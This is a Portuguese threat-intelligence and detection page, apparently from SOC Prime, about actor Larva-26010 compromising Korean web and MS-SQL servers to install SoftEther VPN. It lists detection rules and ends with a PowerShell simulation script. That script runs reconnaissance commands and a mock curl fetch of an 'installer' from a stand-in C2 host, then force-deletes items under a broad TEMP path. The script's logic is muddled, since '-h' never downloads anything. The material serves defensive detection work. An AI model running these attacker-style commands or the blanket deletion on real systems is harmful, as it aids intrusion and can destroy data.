SOC Prime Bias: High

20 Aug 2026 07:34 UTC

Campanha de Malware Alveja Servidores Web Coreanos que Usam SoftEther VPN

Author Photo
SOC Prime Team linkedin icon Seguir
Campanha de Malware Alveja Servidores Web Coreanos que Usam SoftEther VPN
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

O ator de ameaça Larva-26010 está direcionando servidores web e MS-SQL na Coreia do Sul para implantar SoftEther VPN. Sistemas comprometidos são reutilizados como servidores VPN, potencialmente usando conexões em cascata para ocultar a verdadeira infraestrutura de C&C dos atacantes. A intrusão geralmente começa com o comprometimento do servidor web, seguido pela implantação de web shells e SQLShells.

Investigação

O Centro de Inteligência de Segurança da AhnLab identificou atividade de ataque recente ocorrendo entre abril e agosto de 2026. A investigação revelou uma mudança na sequência de ataque, com servidores web sendo comprometidos primeiro, seguidos por comandos de descoberta, instalação do SoftEther VPN e ataques subsequentes contra servidores MS-SQL para implantar CLR SqlShell. Os atacantes também utilizaram ferramentas como PowerShell, bitsadmin, e certutil para entrega de payload.

Mitigação

Os administradores devem inspecionar servidores web quanto a vulnerabilidades exploráveis e validar todos os valores de entrada usados em consultas DBMS e solicitações de serviço web. Permissões de execução devem ser restritas em diretórios de upload, enquanto servidores web IIS e sistemas operacionais devem permanecer totalmente atualizados. Produtos de antivírus e segurança, como V3, também devem ser atualizados para a versão mais recente disponível.

Resposta

Se atividade maliciosa for detectada, servidores web e MS-SQL afetados devem ser isolados imediatamente para limitar o movimento lateral. Investigadores devem determinar a extensão do deployment de web shell e SqlShell e revisar contas de usuário recém-criadas para identificar contas de administrador não autorizadas. Configurações de registro, como UseLogonCredential também devem ser examinadas para modificações suspeitas.

Fluxo de Ataque

Detecções

Usando Certutil para Codificação de Dados e Operações de Certificados (via linha de comando)

Equipe SOC Prime
19 Ago 2026

Download ou Upload via Powershell (via linha de comando)

Equipe SOC Prime
19 Ago 2026

Possível Enumeração do Sistema (via linha de comando)

Equipe SOC Prime
18 Ago 2026

Possível Descoberta da Configuração da Rede do Sistema (via linha de comando)

Equipe SOC Prime
18 Ago 2026

Possível Execução por Uso de Nome Curto de Script (via linha de comando)

Equipe SOC Prime
18 Ago 2026

Uso Suspeito de CURL (via linha de comando)

Equipe SOC Prime
18 Ago 2026

Download de Arquivo Suspeito por IP Direto (via proxy)

Equipe SOC Prime
18 Ago 2026

IOCs (HashMd5) para detectar: Casos de Ataque de Malware para Servidores Web Domésticos Rodando SoftEther VPN na Coreia

Regras de AI SOC Prime
18 Ago 2026

IOCs (SourceIP) para detectar: Casos de Ataque de Malware para Servidores Web Domésticos Rodando SoftEther VPN na Coreia

Regras de AI SOC Prime
18 Ago 2026

IOCs (DestinationIP) para detectar: Casos de Ataque de Malware para Servidores Web Domésticos Rodando SoftEther VPN na Coreia

Regras de AI SOC Prime
18 Ago 2026

Ataque Potencial de DoS Detectado AWS CloudFront [AWS Cloudtrail]

Regras de AI SOC Prime
18 Ago 2026

Downloader de PowerShell e Escalada de Privilégio via Criação de Conta de Usuário [Windows Powershell]

Regras de AI SOC Prime
18 Ago 2026

Descoberta do Microsoft Windows e Instalação do SoftEther VPN [Servidor Web]

Regras de AI SOC Prime
18 Ago 2026

## Execução da Simulação

Pré-requisito: O Check de Telemetria & Baseline Pré-voo deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a erros de diagnóstico.

  • Narrativa de Ataque & Comandos: O adversário obteve acesso inicial através de uma vulnerabilidade na web. Para facilitar o movimento lateral e estabelecer uma backdoor persistente, eles precisam mapear a rede local e baixar o instalador do SoftEther VPN. O atacante executa ipconfig /all para mapear a interface, whoami para confirmar privilégios, e usa curl para buscar o instalador de um servidor de comando e controle remoto (C2). Esta sequência específica é projetada para acionar a lógica de detecção “Instalação do SoftEther VPN” ao corresponder as strings de linha de comando exatas definidas na regra Sigma.

  • Script de Teste de Regressão:

    # Script de Simulação: Descoberta SoftEther e Download de Payload
    # Este script executa os comandos exatos que a regra procura.
    
    Write-Host "[+] Iniciando Fase de Descoberta..." -ForegroundColor Cyan
    
    # Comando de seleção ativado: 'whoami'
    whoami
    
    # Comando de seleção ativado: 'ipconfig /all'
    ipconfig /all
    
    # Comando de seleção ativado: 'netstat -ano -p tcp'
    netstat -ano -p tcp
    
    # Comando de seleção ativado: 'systeminfo'
    systeminfo
    
    Write-Host "[+] Iniciando Fase de Download de Payload..." -ForegroundColor Cyan
    
    # Imagens de seleção ativadas: 'curl.exe' E comando de seleção ativado: 'curl -h'
    # Nota: Usamos -h para permanecer dentro da lógica da regra ao simular uma intenção de download
    curl -h https://example.com/softether_installer.exe
    
    Write-Host "[+] Simulação Completa." -ForegroundColor Green
  • Comandos de Limpeza:

    # Nenhum arquivo foi realmente baixado nesta simulação, 
    # mas garantimos que nenhum artefato permaneça.
    Remove-Item -Path "$env:TEMP*" -Force -ErrorAction SilentlyContinue